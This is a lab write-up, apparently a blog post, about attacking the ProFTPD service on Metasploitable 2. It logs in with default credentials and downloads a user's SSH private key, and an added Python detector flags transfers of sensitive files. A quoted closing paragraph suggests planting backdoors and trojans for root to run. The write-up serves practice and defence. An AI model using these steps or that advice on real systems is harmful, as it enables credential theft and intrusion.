The Nmap scan of Metasploitable 2 revealed:
PORT STATE SERVICE VERSION
2121/tcp open ftp ProFTPD 1.3.1
The Nessus report on Port 2121 had this to say:
2121/tcp FTP Supports Clear Text Authentication
Synopsis
Authentication credentials might be intercepted.
Description
The remote FTP server allows the user’s name and password to be transmitted in clear text, which could be intercepted by a network sniffer or a man-in-the-middle attack.
In truth, none of this information helped me, and I was unable to find a Metasploit exploit that related to version 1.3.1. Attacks on other versions were available.
I had a look for exploits in the wild, but again, couldn’t figure out their application.
Most of the guidance online talks of using a password cracking tool for this ftp service; however, I’m going to skip that and presume that within the context of previous exploits we have already enumerated user names and passwords.
So, to log in via the attacking terminal, we will use the credentials msfadmin/msfadmin for username/password:
~# ftp 192.168.1.103 2121
Connected to 192.168.1.103.
220 ProFTPD 1.3.1 Server (Debian) [::ffff:192.168.1.103]
Name (192.168.1.103:root): msfadmin
331 Password required for msfadmin
Password:
230 User msfadmin logged in
Remote system type is UNIX.
Using binary mode to transfer files.
Then we can have a look at files:
ftp> ls -lat
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwx------ 2 msfadmin msfadmin 4096 Nov 14 11:25 .gconfd
drwx------ 2 msfadmin msfadmin 4096 Nov 14 11:25 .gconf
drwxr-xr-x 7 msfadmin msfadmin 4096 Nov 13 11:25 .
-rwx------ 1 msfadmin msfadmin 4 May 20 2012 .rhosts
-rw------- 1 root root 4174 May 14 2012 .mysql_history
lrwxrwxrwx 1 root root 9 May 14 2012 .bash_history -> /dev/null
drwx------ 2 msfadmin msfadmin 4096 May 18 2010 .ssh
-rw-r--r-- 1 msfadmin msfadmin 0 May 7 2010 .sudo_as_admin_successful
drwxr-xr-x 6 msfadmin msfadmin 4096 Apr 28 2010 vulnerable
drwxr-xr-x 4 msfadmin msfadmin 4096 Apr 17 2010 .distcc
drwxr-xr-x 6 root root 4096 Apr 16 2010 ..
-rw-r--r-- 1 msfadmin msfadmin 586 Mar 16 2010 .profile
226 Transfer complete
And download some files for further investigation:
ftp> get .bash_history
local: .bash_history remote: .bash_history
200 PORT command successful
550 .bash_history: Not a regular file
ftp> get .profile
local: .profile remote: .profile
200 PORT command successful
150 Opening BINARY mode data connection for .profile (586 bytes)
226 Transfer complete
586 bytes received in 0.01 secs (89.9 kB/s)
We can navigate to .ssh and look for files:
ftp> cd .ssh
250 CWD command successful
ftp> ls -lat
200 PORT command successful
150 Opening ASCII mode data connection for file list
drwxr-xr-x 7 msfadmin msfadmin 4096 Nov 13 11:25 ..
drwx------ 2 msfadmin msfadmin 4096 May 18 2010 .
-rw------- 1 msfadmin msfadmin 1675 May 18 2010 id_rsa
-rw-r--r-- 1 msfadmin msfadmin 405 May 18 2010 id_rsa.pub
-rw-r--r-- 1 msfadmin msfadmin 609 May 7 2010 authorized_keys
226 Transfer complete
And then download the key pair:
ftp> get id_rsa
local: id_rsa remote: id_rsa
200 PORT command successful
150 Opening BINARY mode data connection for id_rsa (1675 bytes)
226 Transfer complete
1675 bytes received in 0.02 secs (88.6 kB/s)
ftp> get id_rsa.pub
local: id_rsa.pub remote: id_rsa.pub
200 PORT command successful
150 Opening BINARY mode data connection for id_rsa.pub (405 bytes)
226 Transfer complete
405 bytes received in 0.00 secs (275.4 kB/s)
ftp>
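From the defender's side, the transfers above would show up in the server's FTP transfer log. As an added example (not code from the original post), the following Python script parses lines in the wu-ftpd xferlog format that ProFTPD's TransferLog directive writes and flags completed downloads of the sensitive files seen in msfadmin's home directory; the log lines and the client address 192.168.1.100 are constructed samples.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# Files whose download over FTP should raise an alert (they match what was in msfadmin's home above).
SENSITIVE_PATTERNS = [
    re.compile(r"/\.ssh/(id_rsa|id_dsa|id_ecdsa|id_ed25519)$"),  # private keys, not the .pub files
    re.compile(r"/\.ssh/authorized_keys$"),
    re.compile(r"/\.rhosts$"),
    re.compile(r"/\.mysql_history$"),
]

@dataclass
class Transfer:
    timestamp: str
    remote_host: str
    size: int
    path: str
    direction: str  # 'o' = outgoing (client downloaded), 'i' = incoming (client uploaded)
    user: str
    status: str     # 'c' = complete, 'i' = incomplete

def parse_xferlog(line: str) -> Optional[Transfer]:
    """Parse one xferlog-format line: a 5-token timestamp followed by 13 transfer fields."""
    fields = line.split()
    if len(fields) < 18:
        return None
    f = fields[5:]
    # f: xfer-time host size path type special direction mode user service auth uid status
    return Transfer(" ".join(fields[:5]), f[1], int(f[2]), f[3], f[6], f[8], f[12])

def flag_sensitive_downloads(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (user, remote_host, path) for each completed download of a sensitive file."""
    alerts = []
    for line in lines:
        t = parse_xferlog(line)
        if t is None or t.direction != "o" or t.status != "c":
            continue
        if any(p.search(t.path) for p in SENSITIVE_PATTERNS):
            alerts.append((t.user, t.remote_host, t.path))
    return alerts

# Constructed sample log (not from the original post) modelled on the session above.
SAMPLE_LOG = [
    "Mon Nov 14 11:30:01 2016 1 192.168.1.100 586 /home/msfadmin/.profile b _ o r msfadmin ftp 0 * c",
    "Mon Nov 14 11:31:15 2016 1 192.168.1.100 1675 /home/msfadmin/.ssh/id_rsa b _ o r msfadmin ftp 0 * c",
    "Mon Nov 14 11:31:16 2016 1 192.168.1.100 405 /home/msfadmin/.ssh/id_rsa.pub b _ o r msfadmin ftp 0 * c",
    "Mon Nov 14 11:32:00 2016 1 192.168.1.100 4 /home/msfadmin/.rhosts b _ o r msfadmin ftp 0 * c",
    "Mon Nov 14 11:33:00 2016 1 192.168.1.100 12 /home/msfadmin/notes.txt b _ i r msfadmin ftp 0 * c",
]
```

Running `flag_sensitive_downloads(SAMPLE_LOG)` yields two alerts, for id_rsa and .rhosts; the .profile download, the public key and the upload are ignored.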
Hat-tip to the iPositive Security Blog, which concludes with:
The user has Read/Write privileges using the FTP service. Even though these users are non-root accounts and have RW privs in their home directories, we have gained a foothold into the target. This is also applicable to other system / network services such as samba [ file sharing ] or ssh [ remote access ]. Using these accounts, it is now possible for us to explore the file system, configuration(s), set up, any specific software(s) / applications that are installed and may be vulnerable. Also a good idea is to upload backdoor / malware / trojan / privilege escalation exploit(s) on the server. The expectation is to wait for some user, usually root or a root-privileged user, to access these malicious exes and run them. Once the exe runs, depending upon its function, a variety of actions can be performed. Actions can include, and are not limited to, gaining a shell, executing commands, sniffing sensitive data off the wire and sending the logs to the attacker, enumerating other systems in the network environment for further exploitation, etc., and many more.